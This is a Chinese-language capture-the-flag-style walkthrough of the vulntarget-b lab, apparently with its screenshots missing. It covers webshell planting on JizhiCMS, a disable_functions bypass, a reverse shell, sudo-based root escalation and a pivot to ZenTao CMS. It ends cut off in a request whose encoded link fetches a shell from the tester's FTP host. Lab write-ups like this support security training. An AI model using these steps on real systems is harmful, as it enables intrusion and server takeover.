01vulntarget-b拓扑
IP1:192.168.10.104
IP2:10.0.20.30
搭建好环境之后,开始我们的实验。
vulntarget-2下载地址
百度云:
链接: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA
提取码:s4ka
阿里云暂不支持zip文件分享。。。。。
原文地址:vulntarget漏洞靶场系列(二)— vulntarget-b
关于vulntarget漏洞靶场:
https://github.com/crow821/vulntarget
02打 靶 流 程
2.1 WEB渗透-Centos7
对WEB服务器进行端口扫描,看到开放的一些端口情况。其中888是phpmyadmin,8888是bt。
查看一下详情:
来到81端口,是一个极致cms建站系统,从弱口令登录。一开始尝试了很多前台SQL注入漏洞,都不存在:
后台的扩展管理的位置存在任意文件压缩下载,需要启动一个服务,然后再download_url=的位置传入,就会下载文件:
使用冰蝎工具进行连接:
当执行命令的时候,发现函数被禁用了,在phpinfo的位置查看disable_function能看到什么函数被禁用:
然后使用蚁剑的插件进行绕过,成功执行命令:
生成一个反向的后门文件,反弹shell到meterpreter:
使用suggester脚本,进行提权的搜索。存在三个提权的方法:
使用sudo_baron_samedit提权至root权限:
2.2 横向移动-禅道CMS
查看网卡信息,存在第二块网卡:
在根目录发现了flag
接着进行内网渗透,先添加路由表,让我们能跨路由进行攻击:
使用fscan进行端口扫描,但是常规的方式没有发现其他的IP
使用portscan模块指定一部分常用端口,进行扫描。发现了20.66
同样使用nmap的端口扫描,发现开放了3306和8080端口
打开8080是一个禅道cms。这里也是用了注入漏洞,文件读取都未成功:
然后查看文档,使用弱口令登录后台:
使用后台的任意文件下载漏洞获取shell,首先启动一个web服务:
/index.php?m=client&f=download&version=1&link=ZnRwOi8vMTkyLjE2OC41Mi4xL3NoZWxsLnB
